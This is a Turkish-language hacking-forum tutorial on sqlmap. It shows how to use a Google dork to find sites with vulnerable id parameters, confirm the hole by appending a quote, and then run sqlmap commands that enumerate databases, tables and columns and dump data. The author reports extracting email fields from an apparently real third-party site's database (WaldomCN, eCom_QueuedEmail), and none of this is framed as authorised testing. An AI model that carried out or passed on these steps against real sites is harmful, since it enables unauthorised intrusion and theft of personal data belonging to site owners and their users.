SQLMAP kullanımı

xeax

Uzman üye
15 Şub 2021
1,111
578
localhost
Hepinize merhaba Son zamanlarda Forumda işte sqlmapde şu hatayı alıyorum - sqlmap nasıl kullanılır diye çok fazla Konu açıldı bende buna bir çözüm getireyim dedim :)

İlk başta SQL açıklı site bulmamız lazım bunuda kolaylaştırmak için Dork kullanıcağız

DORK Nedir : Dork nedir
Terimler:
DB = database yemek menüsü olarak hayal edin
Nedir database : Veri tabanları yapılandırılmış bilgi veya verilerin depolandığı alanlardır
table : yemek menüsündeki kategoriler olarak hayal edin
colon : yemekler olarak hayal edin

1 : Dork bulmamız lazım
Bunun için google'ye SQL dork yazacağız
sql dork list
Tamamdır aralarından bir tane dork seçiyoruz.
Ben trainers.php?id= Seçtim
Çünkü hala aktif olan bir dork

Karşımıza Birsürü site çıktı bir tanesine giriyoruz

cif3m2j.png Evet sitemize girdik ve hemen urlye bakıyoruz ID= yazıyormu diye yazıyor ise SQL açığı varmı diye bakmak çok daha kolay

İD=7 nin yanına bir adet ' koyuyoruz

SQL syntax bir hata alırsak sitede SQL açığı olma ihtimali yüksek

Şimdi bunu sömürmemiz lazım bunun için ise çok populer olan Kalide otomatik kurulu gelen SQLMAP aracını kullanıcağız


Tırnakları silip
Kod:
sqlmap -u url --batch
yazıyoruz

--batch : otomatik sizin yerinize y/n yazan komuttur


Böyle bir hata aldık sitede sql açığı yokmuş :(

Neyse başka site deniyelim böyle deniye deniye bir site buldum

Siteleri geze geze böyle bir hata aldık
hemen y diyelim Sitede başka açık varmı yokmu diye

Kod:
sqlmap -u url --dbs

Bu komut bize database isimlerini gösterir gösterir


Karşımıza bir sürü çıktı 1 tanesine girelim şimdi

Kod:
sqlmap -u -D dbname --tables

Bu bize databasedeki tabloları gösterir


Gördüğünüz gibi databasedeki tabloları çekiyor

Siz istediğiniz şeyi çekin ben Emailleri çekmek istiyorum

Terminaldeki find yerine Email yazıyoruz ve emaiların olduğu tabloyu buluyoruz

Kod:
sqlmap -u URL -D WaldomCN -T eCom_QueuedEmail  --columns
--columns DBdeki tabloların kolonlarını çeker


Gördüğünüz gibi kolonları çekti şimdi bizimde son olarak yapmamız gereken birşey kaldı

Kod:
sqlmap -u URL -D WaldomCN -T eCom_QueuedEmail  -C Cc,FromName,Bcc --dump
--dump komutuda son olarak koymamız gereken komuttur

--dump : bize bu bilgileri gösteren komuttur


Ve gördüğünüz gibi emailleri çekti ve bize gösteriyor

Umarım faydalı olmuştur teşekkür ederim
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.